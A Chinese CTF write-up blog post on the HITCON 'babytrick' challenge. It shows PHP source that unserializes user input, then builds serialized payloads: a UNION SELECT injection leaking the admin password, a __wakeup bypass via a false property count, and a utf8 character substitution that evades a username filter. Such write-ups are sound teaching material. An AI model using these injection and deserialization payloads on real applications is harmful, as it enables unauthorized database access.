<!DOCTYPE html>
<html>
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="utf-8">
  <title>HITCON-babytrick | Hexo</title>
  <meta name="keywords" content=" WP , SQL , serialize ">
  <meta name="description" content="HITCON-babytrick | Hexo">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="description" content="8/22/2019 11:39:23 AM  HostSplit-Exploitable-Antipatterns-In-Unicode-Normalization 学习IDN 与 UTF-8IDN  国际化域名IDNs (Internationalized Domain Names)也称多语种域名，是指非英语国家为推广本国语言的域名系统的一个总称，例如含有日文的为日文域名，含有中文的域名为中文域">
<meta name="keywords" content="python">
<meta property="og:type" content="article">
<meta property="og:title" content="HostSplit-Exploitable">
<meta property="og:url" content="https://github.com/BrainLyh/2019/08/22/HostSplit/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="8/22/2019 11:39:23 AM  HostSplit-Exploitable-Antipatterns-In-Unicode-Normalization 学习IDN 与 UTF-8IDN  国际化域名IDNs (Internationalized Domain Names)也称多语种域名，是指非英语国家为推广本国语言的域名系统的一个总称，例如含有日文的为日文域名，含有中文的域名为中文域">
<meta property="og:locale" content="default">
<meta property="og:image" content="http://wx2.sinaimg.cn/mw690/006boCb9ly1g68vpab2bbj30qn08tq3k.jpg">
<meta property="og:image" content="http://wx4.sinaimg.cn/mw690/006boCb9ly1g68vpd5xcfj30pa09pq3k.jpg">
<meta property="og:image" content="http://wx1.sinaimg.cn/mw690/006boCb9ly1g68vpgbsavj30qj0dq765.jpg">
<meta property="og:image" content="http://wx3.sinaimg.cn/mw690/006boCb9ly1g68vpjpmkej30oy0cgdh1.jpg">
<meta property="og:image" content="http://wx4.sinaimg.cn/mw690/006boCb9ly1g68vpmmt76j30ok070dgl.jpg">
<meta property="og:updated_time" content="2019-08-31T13:56:26.911Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="HostSplit-Exploitable">
<meta name="twitter:description" content="8/22/2019 11:39:23 AM  HostSplit-Exploitable-Antipatterns-In-Unicode-Normalization 学习IDN 与 UTF-8IDN  国际化域名IDNs (Internationalized Domain Names)也称多语种域名，是指非英语国家为推广本国语言的域名系统的一个总称，例如含有日文的为日文域名，含有中文的域名为中文域">
<meta name="twitter:image" content="http://wx2.sinaimg.cn/mw690/006boCb9ly1g68vpab2bbj30qn08tq3k.jpg">


<link rel="icon" href="/img/avatar.jpg">

<link href="/css/style.css?v=1.0.1" rel="stylesheet">

<link href="/css/hl_theme/gruvbox-dark.css?v=1.0.1" rel="stylesheet">

<link href="//cdn.bootcss.com/animate.css/3.5.2/animate.min.css" rel="stylesheet">
<link href="//cdn.bootcss.com/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet">

<script src="//cdn.bootcss.com/jquery/2.2.4/jquery.min.js"></script>
<script src="/js/jquery.autocomplete.min.js?v=1.0.1"></script>

<script src="//cdn.bootcss.com/highlight.js/9.12.0/highlight.min.js"></script>
<script>
    hljs.initHighlightingOnLoad();
</script>

<script src="//cdn.bootcss.com/nprogress/0.2.0/nprogress.min.js"></script>



<script src="//cdn.bootcss.com/jquery-cookie/1.4.1/jquery.cookie.min.js"></script>

<script src="/js/iconfont.js?v=1.0.1"></script>

</head>
<div style="display: none">
  <input class="theme_disqus_on" value="false">
  <input class="theme_preload_comment" value="false">
  <input class="theme_blog_path" value>
</div>

<body>
<aside class="nav">
    <div class="nav-left">
        <a href="/" class="avatar_target">
    <img class="avatar" src="/img/avatar.jpg" />
</a>
<div class="author">
    <span>Luc1fer</span>
</div>

<div class="icon">
    
        
        <a title="rss" href="/atom.xml" target="_blank">
            
                <svg class="iconfont-svg" aria-hidden="true">
                    <use xlink:href="#icon-rss"></use>
                </svg>
            
        </a>
        
    
        
        <a title="github" href="https://github.com/BrainLyh" target="_blank">
            
                <svg class="iconfont-svg" aria-hidden="true">
                    <use xlink:href="#icon-github"></use>
                </svg>
            
        </a>
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
        <a title="email" href="mailto:brainsemail@163.com" target="_blank">
            
                <svg class="iconfont-svg" aria-hidden="true">
                    <use xlink:href="#icon-email"></use>
                </svg>
            
        </a>
        
    
        
        <a title="qq" href="http://wpa.qq.com/msgrd?v=3&uin=12128&site=qq&menu=yes" target="_blank">
            
                <svg class="iconfont-svg" aria-hidden="true">
                    <use xlink:href="#icon-qq"></use>
                </svg>
            
        </a>
        
    
        
    
        
        <a title="neteasemusic" href="https://music.163.com/#/user/home?id=125977062" target="_blank">
            
                <svg class="iconfont-svg" aria-hidden="true">
                    <use xlink:href="#icon-neteasemusic"></use>
                </svg>
            
        </a>
        
    
</div>




<ul>
    <li><div class="all active">全部文章<small>(27)</small></div></li>
    
        
            
            <li><div data-rel="WP">WP<small>(5)</small></div>
                
            </li>
            
        
    
        
            
            <li><div data-rel="ctf">ctf<small>(17)</small></div>
                
            </li>
            
        
    
        
            
            <li><div data-rel="比赛回顾">比赛回顾<small>(1)</small></div>
                
            </li>
            
        
    
        
            
            <li><div data-rel="渗透测试">渗透测试<small>(2)</small></div>
                
            </li>
            
        
    
        
            
            <li><div data-rel="docker">docker<small>(1)</small></div>
                
            </li>
            
        
    
        
            
            <li><div data-rel="wp">wp<small>(1)</small></div>
                
            </li>
            
        
    
</ul>
<div class="left-bottom">
    <div class="menus">
    
    
    
    
    </div>
    <div><a  class="friends">友链</a></div>
</div>
<input type="hidden" id="yelog_site_posts_number" value="27">

<div style="display: none">
    <span id="busuanzi_value_site_uv"></span>
    <span id="busuanzi_value_site_pv"></span>
</div>

    </div>
    <div class="nav-right">
        <div class="friends-area">
    <div class="friends-title">
        友情链接
        <i class="back-title-list"></i>
    </div>
    <div class="friends-content">
        <ul>
            
            <li><a target="_blank" href="http://www.gtfly.top/">gtfly</a></li>
            
            <li><a target="_blank" href="https://www.leavesongs.com/">P神</a></li>
            
        </ul>
    </div>
</div>
        <div class="title-list">
    <form onkeydown="if(event.keyCode==13){return false;}">
        <input class="search" type="text" placeholder="Search..." autocomplete="off"id="local-search-input" >
        <i class="cross"></i>
        <span>
            <label for="tagswitch">Tags:</label>
            <input id="tagswitch" type="checkbox" style="display: none" />
            <i id="tagsWitchIcon"></i>
        </span>
    </form>
    <div class="tags-list">
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color3">WP</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color2">python</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color1">javascript</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color5">比赛回顾</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color4">LSB</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color5">MISC</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color3">隐写</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color3">工具</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color5">渗透测试</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color1">mysql load data</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color4">SQL</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color5">SSTI</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color1">redis</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color5">ssrf</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color2">Xdebuf</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color4">ctf</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color4">RSA</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color4">xxe</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color2">docker</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color5">serialize</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color4">php</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color4">弱类型</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color5">命令执行</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color4">zip</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color5">misc</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color4">哈希长度扩展攻击</a>
    </li>
    
    <div class="clearfix"></div>
</div>

    
    <nav id="title-list-nav">
        
        <a  class="WP "
           href="/2018/03/23/CSAW CTF 2016 mfw Writeup/"
           data-tag="WP"
           data-author="" >
            <span class="post-title" title="CSAW CTF 2016 mfw Writeup">CSAW CTF 2016 mfw Writeup</span>
            <span class="post-date" title="2018-03-23 15:13:47">2018/03/23</span>
        </a>
        
        <a  class="ctf "
           href="/2019/08/22/HostSplit/"
           data-tag="python"
           data-author="" >
            <span class="post-title" title="HostSplit-Exploitable">HostSplit-Exploitable</span>
            <span class="post-date" title="2019-08-22 11:39:23">2019/08/22</span>
        </a>
        
        <a  class="WP "
           href="/2017/03/23/HackLu Flatscience WP/"
           data-tag="WP"
           data-author="" >
            <span class="post-title" title="HackLu FlatScience WP">HackLu FlatScience WP</span>
            <span class="post-date" title="2017-03-23 15:13:47">2017/03/23</span>
        </a>
        
        <a  class="ctf "
           href="/2019/08/31/JavaScript原型污染/"
           data-tag="javascript"
           data-author="" >
            <span class="post-title" title="JavaScript Prototype 污染攻击">JavaScript Prototype 污染攻击</span>
            <span class="post-date" title="2019-08-31 21:55:35">2019/08/31</span>
        </a>
        
        <a  class="比赛回顾 "
           href="/2018/07/22/ISCC线下赛回顾/"
           data-tag="比赛回顾"
           data-author="" >
            <span class="post-title" title="2019 ISCC线下赛回顾">2019 ISCC线下赛回顾</span>
            <span class="post-date" title="2018-07-22 15:00:00">2018/07/22</span>
        </a>
        
        <a  class="ctf "
           href="/2018/03/23/LSB隐写/"
           data-tag="LSB,MISC,隐写"
           data-author="" >
            <span class="post-title" title="LSB图片隐写">LSB图片隐写</span>
            <span class="post-date" title="2018-03-23 15:13:47">2018/03/23</span>
        </a>
        
        <a  class="渗透测试 "
           href="/2018/02/23/Nessus使用指南/"
           data-tag="工具,渗透测试"
           data-author="" >
            <span class="post-title" title="Nessus 使用指南">Nessus 使用指南</span>
            <span class="post-date" title="2018-02-23 15:13:47">2018/02/23</span>
        </a>
        
        <a  class="ctf "
           href="/2019/08/07/MySQL LOAD DATA/"
           data-tag="mysql load data"
           data-author="" >
            <span class="post-title" title="MYSQL LOAD DATA">MYSQL LOAD DATA</span>
            <span class="post-date" title="2019-08-07 22:14:02">2019/08/07</span>
        </a>
        
        <a  class="ctf "
           href="/2019/08/02/SQL入门/"
           data-tag="SQL"
           data-author="" >
            <span class="post-title" title="SQL入门">SQL入门</span>
            <span class="post-date" title="2019-08-02 09:43:50">2019/08/02</span>
        </a>
        
        <a  class="ctf "
           href="/2019/08/30/SSTI/"
           data-tag="SSTI"
           data-author="" >
            <span class="post-title" title="SSTI-服务器端模板注入">SSTI-服务器端模板注入</span>
            <span class="post-date" title="2019-08-30 15:28:13">2019/08/30</span>
        </a>
        
        <a  class="ctf "
           href="/2019/08/16/SSRF/"
           data-tag="redis,ssrf"
           data-author="" >
            <span class="post-title" title="redis与ssrf">redis与ssrf</span>
            <span class="post-date" title="2019-08-16 16:11:22">2019/08/16</span>
        </a>
        
        <a  class="ctf "
           href="/2019/08/17/Xdebug/"
           data-tag="Xdebuf,ctf"
           data-author="" >
            <span class="post-title" title="Xdebug">Xdebug</span>
            <span class="post-date" title="2019-08-17 23:23:45">2019/08/17</span>
        </a>
        
        <a  class="WP "
           href="/2019/07/26/peaCTF-WP/"
           data-tag="WP,RSA"
           data-author="" >
            <span class="post-title" title="peaCTF WP">peaCTF WP</span>
            <span class="post-date" title="2019-07-26 15:13:47">2019/07/26</span>
        </a>
        
        <a  class="ctf "
           href="/2019/08/17/xxe/"
           data-tag="xxe"
           data-author="" >
            <span class="post-title" title="xxe">xxe</span>
            <span class="post-date" title="2019-08-17 15:23:51">2019/08/17</span>
        </a>
        
        <a  class="ctf "
           href="/2019/08/10/redis/"
           data-tag="redis,ssrf"
           data-author="" >
            <span class="post-title" title="redis与ssrf">redis与ssrf</span>
            <span class="post-date" title="2019-08-10 15:44:26">2019/08/10</span>
        </a>
        
        <a  class="docker "
           href="/2019/08/02/ubuntu配置docker/"
           data-tag="docker"
           data-author="" >
            <span class="post-title" title="Ubuntu 16.04 配置docker">Ubuntu 16.04 配置docker</span>
            <span class="post-date" title="2019-08-02 16:15:29">2019/08/02</span>
        </a>
        
        <a  class="ctf "
           href="/2019/03/23/序列化与反序列化/"
           data-tag="serialize,php"
           data-author="" >
            <span class="post-title" title="序列化与反序列化">序列化与反序列化</span>
            <span class="post-date" title="2019-03-23 15:13:47">2019/03/23</span>
        </a>
        
        <a  class="渗透测试 "
           href="/2018/03/23/渗透测试-信息收集/"
           data-tag="渗透测试"
           data-author="" >
            <span class="post-title" title="渗透测试-信息收集">渗透测试-信息收集</span>
            <span class="post-date" title="2018-03-23 15:13:47">2018/03/23</span>
        </a>
        
        <a  class="ctf "
           href="/2019/08/19/Black_magic/"
           data-tag="php,弱类型"
           data-author="" >
            <span class="post-title" title="black_magic">black_magic</span>
            <span class="post-date" title="2019-08-19 18:59:50">2019/08/19</span>
        </a>
        
        <a  class="ctf "
           href="/2019/03/23/Command-Execution/"
           data-tag="php,命令执行"
           data-author="" >
            <span class="post-title" title="命令执行漏洞(Command Execution)">命令执行漏洞(Command Execution)</span>
            <span class="post-date" title="2019-03-23 15:13:47">2019/03/23</span>
        </a>
        
        <a  class="WP "
           href="/2018/03/23/HITCON-Babytrick/"
           data-tag="WP,SQL,serialize"
           data-author="" >
            <span class="post-title" title="HITCON-babytrick">HITCON-babytrick</span>
            <span class="post-date" title="2018-03-23 15:13:47">2018/03/23</span>
        </a>
        
        <a  class="wp "
           href="/2019/08/16/De1ctf/"
           data-tag="ssrf,RSA"
           data-author="" >
            <span class="post-title" title="De1ctf">De1ctf</span>
            <span class="post-date" title="2019-08-16 20:00:50">2019/08/16</span>
        </a>
        
        <a  class="ctf "
           href="/2018/05/23/RSA/"
           data-tag="RSA"
           data-author="" >
            <span class="post-title" title="RSA">RSA</span>
            <span class="post-date" title="2018-05-23 15:13:47">2018/05/23</span>
        </a>
        
        <a  class="ctf "
           href="/2019/03/23/ZIP伪加密/"
           data-tag="zip,misc"
           data-author="" >
            <span class="post-title" title="ZIP&#39;s things">ZIP&#39;s things</span>
            <span class="post-date" title="2019-03-23 15:13:47">2019/03/23</span>
        </a>
        
        <a  class="ctf "
           href="/2019/08/01/session_unserialize/"
           data-tag="serialize,php"
           data-author="" >
            <span class="post-title" title="Session_unserlize">Session_unserlize</span>
            <span class="post-date" title="2019-08-01 19:33:07">2019/08/01</span>
        </a>
        
        <a  class="WP "
           href="/2019/08/01/JarvisOJ/"
           data-tag="WP,SQL,serialize,哈希长度扩展攻击"
           data-author="" >
            <span class="post-title" title="JarvisOJ WP">JarvisOJ WP</span>
            <span class="post-date" title="2019-08-01 19:37:28">2019/08/01</span>
        </a>
        
        <a  class="ctf "
           href="/2019/07/28/SQL/"
           data-tag="SQL"
           data-author="" >
            <span class="post-title" title="SQL">SQL</span>
            <span class="post-date" title="2019-07-28 15:13:47">2019/07/28</span>
        </a>
        
    </nav>
</div>
    </div>
    <div class="hide-list">
        <div class="semicircle">
            <div class="brackets first"><</div>
            <div class="brackets">&gt;</div>
        </div>
    </div>
</aside>
<div class="post">
    <div class="pjax">
        <article id="post-HITCON-Babytrick" class="article article-type-post" itemscope itemprop="blogPost">
    
        <h1 class="article-title">HITCON-babytrick</h1>
    
    <div class="article-meta">
        
        
        
        <span class="book">
            
                <a href="javascript:" data-rel="WP">WP</a>
            
        </span>
        
        
        <span class="tag">
            
            <a href="javascript:" class="color3">WP</a>
            
            <a href="javascript:" class="color4">SQL</a>
            
            <a href="javascript:" class="color5">serialize</a>
            
        </span>
        
    </div>
    <div class="article-meta">
        
        创建时间:<time class="date" title='更新时间: 2019-08-01 19:50:29'>2018-03-23 15:13</time>
        
    </div>
    <div class="article-meta">
        
        
        <span id="busuanzi_container_page_pv">
            阅读:<span id="busuanzi_value_page_pv">
                <span class="count-comment">
                    <span class="spinner">
                      <div class="cube1"></div>
                      <div class="cube2"></div>
                    </span>
                </span>
            </span>
        </span>
        
        
    </div>
    
    <div class="toc-ref">
    
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#HITCON-babytrick"><span class="toc-text">HITCON-babytrick</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#0x02-源码分析"><span class="toc-text">0x02 源码分析</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x03开始构造序列化字符串"><span class="toc-text">0x03开始构造序列化字符串</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x03-总结"><span class="toc-text">0x03 总结</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x04-参考链接"><span class="toc-text">0x04 参考链接</span></a></li></ol></li></ol>
    
<style>
    .left-col .switch-btn,
    .left-col .switch-area {
        display: none;
    }
    .toc-level-3 i,
    .toc-level-3 ol {
        display: none !important;
    }
</style>
</div>
    <div class="article-entry" itemprop="articleBody">
      
        <p>too hard</p>
<a id="more"></a>
<h1 id="HITCON-babytrick"><a href="#HITCON-babytrick" class="headerlink" title="HITCON-babytrick"></a>HITCON-babytrick</h1><p>##0x01 需要注意的点 ##</p>
<ul>
<li>php反序列化</li>
<li>简单的注入</li>
<li>字符集绕过</li>
</ul>
<h2 id="0x02-源码分析"><a href="#0x02-源码分析" class="headerlink" title="0x02 源码分析"></a>0x02 源码分析</h2><pre><code>index.php源码
&lt;?php

include &quot;config.php&quot;;

class HITCON{
private $method;
private $args;
private $conn;

public function __construct($method, $args) {
    $this-&gt;method = $method;
    $this-&gt;args = $args;

    $this-&gt;__conn();
}

function show() {
    list($username) = func_get_args();
    $sql = sprintf(&quot;SELECT * FROM users WHERE username=&#39;%s&#39;&quot;, $username);

    $obj = $this-&gt;__query($sql);
    if ( $obj != false  ) {
        $this-&gt;__die( sprintf(&quot;%s is %s&quot;, $obj-&gt;username, $obj-&gt;role) );
    } else {
        $this-&gt;__die(&quot;Nobody Nobody But You!&quot;);
    }

}

function login() {
    global $FLAG;

    list($username, $password) = func_get_args();
    $username = strtolower(trim(mysql_escape_string($username)));
    $password = strtolower(trim(mysql_escape_string($password)));

    $sql = sprintf(&quot;SELECT * FROM users WHERE username=&#39;%s&#39; AND password=&#39;%s&#39;&quot;, $username, $password);

    if ( $username == &#39;orange&#39; || stripos($sql, &#39;orange&#39;) != false ) {
        $this-&gt;__die(&quot;Orange is so shy. He do not want to see you.&quot;);
    }

    $obj = $this-&gt;__query($sql);
    if ( $obj != false &amp;&amp; $obj-&gt;role == &#39;admin&#39;  ) {
        $this-&gt;__die(&quot;Hi, Orange! Here is your flag: &quot; . $FLAG);
    } else {
        $this-&gt;__die(&quot;Admin only!&quot;);
    }
}

function source() {
    highlight_file(__FILE__);
}

function __conn() {
    global $db_host, $db_name, $db_user, $db_pass, $DEBUG;

    if (!$this-&gt;conn)
        $this-&gt;conn = mysql_connect($db_host, $db_user, $db_pass);
    mysql_select_db($db_name, $this-&gt;conn);

    if ($DEBUG) {
        $sql = &quot;CREATE TABLE IF NOT EXISTS users ( 
                    username VARCHAR(64), 
                    password VARCHAR(64), 
                    role VARCHAR(64)
                ) CHARACTER SET utf8&quot;;
        $this-&gt;__query($sql, $back=false);

        $sql = &quot;INSERT INTO users VALUES (&#39;orange&#39;, &#39;$db_pass&#39;, &#39;admin&#39;), (&#39;phddaa&#39;, &#39;ddaa&#39;, &#39;user&#39;)&quot;;
        $this-&gt;__query($sql, $back=false);
    } 

    mysql_query(&quot;SET names utf8&quot;);
    mysql_query(&quot;SET sql_mode = &#39;strict_all_tables&#39;&quot;);
}

function __query($sql, $back=true) {
    $result = @mysql_query($sql);
    if ($back) {
        return @mysql_fetch_object($result);
    }
}

function __die($msg) {
    $this-&gt;__close();

    header(&quot;Content-Type: application/json&quot;);
    die( json_encode( array(&quot;msg&quot;=&gt; $msg) ) );
}

function __close() {
    mysql_close($this-&gt;conn);
}

function __destruct() {
    $this-&gt;__conn();

    if (in_array($this-&gt;method, array(&quot;show&quot;, &quot;login&quot;, &quot;source&quot;))) {
        @call_user_func_array(array($this, $this-&gt;method), $this-&gt;args);
    } else {
        $this-&gt;__die(&quot;What do you do?&quot;);
    }

    $this-&gt;__close();
}

function __wakeup() {
    foreach($this-&gt;args as $k =&gt; $v) {
        $this-&gt;args[$k] = strtolower(trim(mysql_escape_string($v)));
    }
}
}

if(isset($_GET[&quot;data&quot;])) {
@unserialize($_GET[&quot;data&quot;]);    
} else {
new HITCON(&quot;source&quot;, array());
}
?&gt;

下面的是config.php
&lt;?php
$db_host = &#39;localhost&#39;;
$db_name = &#39;babytrick&#39;;
$db_user = &#39;babytrick&#39;;
$db_pass = &#39;babytrick1234&#39;;
$DEBUG = @$_GET[&#39;noggnogg&#39;];
$FLAG = &quot;HITCON{php 4nd mysq1 are s0 mag1c, isn&#39;t it?}&quot;;
?&gt;</code></pre><p>为了在本地更好的复现，修改了部分config.php代码如下：</p>
<pre><code>&lt;?php

$db_host = &#39;localhost&#39;;
$db_name = &#39;test1&#39;;
$db_user = &#39;root&#39;;
$db_pass = &#39;root&#39;;

$DEBUG = @$_GET[&#39;noggnogg&#39;];
$FLAG = &quot;HITCON{php 4nd mysq1 are s0 mag1c, isn&#39;t it?}&quot;;
?&gt;</code></pre><p>分析源码得到ROP链大致为：get参数-&gt;反序列化-&gt;wakeup()-&gt;destruct()。发现现在出现的函数里没有flag的影子，与FLAG有关的在login()函数里</p>
<pre><code>        $obj = $this-&gt;__query($sql);
    if ( $obj != false &amp;&amp; $obj-&gt;role == &#39;admin&#39;  ) {
        $this-&gt;__die(&quot;Hi, Orange! Here is your flag: &quot; . $FLAG);
    } else {
        $this-&gt;__die(&quot;Admin only!&quot;);
    }</code></pre><p>先跟进login()函数查看发现该函数的作用就是将$username和$password带入一条sql语句，在查询之前先进行一次过滤，之后如果查询后的结果满足if判断就可以拿到flag。也就是说我们现在首先要得到username和password的值，再观察代码可以看到conn()函数给出了题目数据库的结构</p>
<pre><code>+----------+----------+-------+
| username | password | role  |
+----------+----------+-------+
| orange   | $db_pass | admin |
| phddaa   | ddaa     | user  |
+----------+----------+-------+</code></pre><p>也就是说我们现在只剩password不知道了。<br>发现show()函数里对传入的参数没有过滤就带入数据库查询，可以在这里尝试注入得到password。</p>
<p>现在似乎该知道的都知道了，可是发现跟之前的序列化调用路径没有关系啊ε=ε=ε=┏(゜ロ゜;)┛</p>
<p>再看代码终于在destruct()里找到了这样的代码</p>
<pre><code>        if (in_array($this-&gt;method, array(&quot;show&quot;, &quot;login&quot;, &quot;source&quot;))) {
        @call_user_func_array(array($this, $this-&gt;method), $this-&gt;args);</code></pre><p>这里限制了$method变量的值必须是这几个中的一种，而这三个又分别对应各自的函数。判断通过后调用回调函数将数组类型的args变量当作参数传入array()中执行method指定的方法。关于回调函数可以参考php_manual的介绍</p>
<pre><code>&lt;?php
function foobar($arg, $arg2) {
echo __FUNCTION__, &quot; got $arg and $arg2\n&quot;;
}
class foo {
function bar($arg, $arg2) {
    echo __METHOD__, &quot; got $arg and $arg2\n&quot;;
}
}


// Call the foobar() function with 2 arguments
call_user_func_array(&quot;foobar&quot;, array(&quot;one&quot;, &quot;two&quot;));

// Call the $foo-&gt;bar() method with 2 arguments
$foo = new foo;
call_user_func_array(array($foo, &quot;bar&quot;), array(&quot;three&quot;, &quot;four&quot;));
?&gt;
输出类似于

foobar got one and two
foo::bar got three and four</code></pre><p>好的，终于把思路理清楚了新的ROP为：get参数-&gt;反序列化-&gt;wakeup()-&gt;destruct()-&gt;show()-&gt;login().</p>
<h2 id="0x03开始构造序列化字符串"><a href="#0x03开始构造序列化字符串" class="headerlink" title="0x03开始构造序列化字符串"></a>0x03开始构造序列化字符串</h2><pre><code>class HITCON{
private $method;
private $args;

public function __construct($method, $args) {
    $this-&gt;method = $method;
    $this-&gt;args = $args;
}
}
$method = &quot;show&quot;;
$args = array(&quot;1&#39; union select password,username,role from users where username=&#39;orange&#39; -- &quot;);
$a = new HITCON($method,$args);
echo serialize($a);  

O:6:&quot;HITCON&quot;:3:{s:14:&quot;%00HITCON%00method&quot;;s:4:&quot;show&quot;;s:12:&quot;%00HITCON%00args&quot;;a:1:{i:0;s:77:&quot;1&#39; union select password,username,role from users where username=&#39;orange&#39; -- &quot;;}}</code></pre><p>这里需要注意的是wake_up()对args进行过滤，因此我们要绕过它，把变量的个数设置大于实际个数就可以，还要注意的是私有变量前后会多两个%00长度也多二。知道这些之后就可以得到password了。</p>
<pre><code>{&quot;msg&quot;:&quot;root is admin&quot;}</code></pre><p>再进行下一步login()：</p>
<pre><code>    class HITCON{
private $method;
private $args;

public function __construct($method, $args) {
    $this-&gt;method = $method;
    $this-&gt;args = $args;
}
    $method = &quot;login&quot;;
$args = array(&#39;orange&#39;,&#39;root&#39;);
$b = new HITCON($method,$args);
echo serialize($b);

O:6:&quot;HITCON&quot;:3:{s:14:&quot;%00HITCON%00method&quot;;s:5:&quot;login&quot;;s:12:&quot;%00HITCON%00args&quot;;a:2:{i:0;s:6:&quot;orange&quot;;i:1;s:4:&quot;root&quot;;}}</code></pre><p>得到如下结果</p>
<pre><code>{&quot;msg&quot;:&quot;Orange is so shy. He do not want to see you.&quot;}</code></pre><p>还需要绕过对orange的判断。由于代码中在链接数据库时设置了字符编码为utf8编码，所以尝试字符差异绕过<br>将a替换成Ã、Ä…这里注意替换完之后长度会加一。同理替换e或着其他的字母都行。</p>
<pre><code>O:6:&quot;HITCON&quot;:3:{s:14:&quot;%00HITCON%00method&quot;;s:5:&quot;login&quot;;s:12:&quot;%00HITCON%00args&quot;;a:2:{i:0;s:7:&quot;orÄnge&quot;;i:1;s:4:&quot;root&quot;;}}</code></pre><p>得到flag</p>
<pre><code>{&quot;msg&quot;:&quot;Hi, Orange! Here is your flag: HITCON{php 4nd mysq1 are s0 mag1c, isn&#39;t it?}&quot;}</code></pre><h2 id="0x03-总结"><a href="#0x03-总结" class="headerlink" title="0x03 总结"></a>0x03 总结</h2><p>做题时思路要发散，做题看到反序列化就盯着几个魔法函数不动也不行。</p>
<p>对于关键的函数一定要好好查查清楚到底啥作用，你问什么是关键函数？一个一个去查手册啊，就像这道题的回调函数，我刚开始看的时候死活找不到怎么把flag和反序列化联系在一起，真的是看的头秃才注意到回调函数/(ㄒoㄒ)/~~。</p>
<p>构造序列化字符串还不熟，这道题的第二个反序列化做的时候也是没一下想到怎么把username和password传进去，还是自己太菜。</p>
<h2 id="0x04-参考链接"><a href="#0x04-参考链接" class="headerlink" title="0x04 参考链接"></a>0x04 参考链接</h2><blockquote>
<p><a href="https://www.freebuf.com/vuls/116705.html" target="_blank" rel="noopener">https://www.freebuf.com/vuls/116705.html</a></p>
</blockquote>
<blockquote>
<p><a href="https://blog.csdn.net/qq_42196196/article/details/81217375" target="_blank" rel="noopener">https://blog.csdn.net/qq_42196196/article/details/81217375</a></p>
</blockquote>
<blockquote>
<p><a href="https://blog.csdn.net/wy_97/article/details/77749008" target="_blank" rel="noopener">https://blog.csdn.net/wy_97/article/details/77749008</a></p>
</blockquote>

      
       <hr><span style="font-style: italic;color: gray;"> 转载请注明来源，欢迎对文章中的引用来源进行考证，欢迎指出任何有错误或不够清晰的表达。可以在下面评论区评论，也可以邮件至 brainsemail@163.com </span>
    </div>
</article>


<p>
    <a href="javascript:void(0)" class="dashang" onclick="dashangToggle()">赏</a>
</p>


<div class="article_copyright">
    <p><span class="copy-title">文章标题:</span>HITCON-babytrick</p>
    
    <p><span class="copy-title">本文作者:</span><a href="javascript:void(0)" title="Luc1fer">Luc1fer</a></p>
    <p><span class="copy-title">发布时间:</span>2018-03-23, 15:13:47</p>
    <p><span class="copy-title">最后更新:</span>2019-08-01, 19:50:29</p>
    <span class="copy-title">原始链接:</span><a class="post-url" href="/2018/03/23/HITCON-Babytrick/" title="HITCON-babytrick">https://github.com/BrainLyh/2018/03/23/HITCON-Babytrick/</a>
    <p>
        <span class="copy-title">版权声明:</span><i class="fa fa-creative-commons"></i> <a rel="license" href="http://creativecommons.org/licenses/by-nc-sa/4.0/" title="CC BY-NC-SA 4.0 International" target = "_blank">"署名-非商用-相同方式共享 4.0"</a> 转载请保留原文链接及作者。
    </p>
</div>





    




    </div>
    <div class="copyright">
        <p class="footer-entry">©2016-2019 Yelog</p>
<p class="footer-entry">Built with <a href="https://hexo.io/" target="_blank">Hexo</a> and <a href="https://github.com/yelog/hexo-theme-3-hexo" target="_blank">3-hexo</a> theme</p>

    </div>
    <div class="full-toc">
        <button class="full"><span class="min "></span></button>
<button class="post-toc-menu"><span class="post-toc-menu-icons"></span></button>
<div class="post-toc"><span class="post-toc-title">目录</span>
    <div class="post-toc-content">

    </div>
</div>
<a class="" id="rocket" href="javascript:void(0)"></a>
    </div>
</div>
<div class="acParent"></div>

<div class="hide_box" onclick="dashangToggle()"></div>
<div class="shang_box">
    <a class="shang_close" href="javascript:void(0)" onclick="dashangToggle()">×</a>
    <div class="shang_tit">
        <p>喜欢就点赞,疼爱就打赏</p>
    </div>
    <div class="shang_payimg">
        <div class="pay_img">
            <img src="/img/alipay.jpg" class="alipay" title="扫码支持">
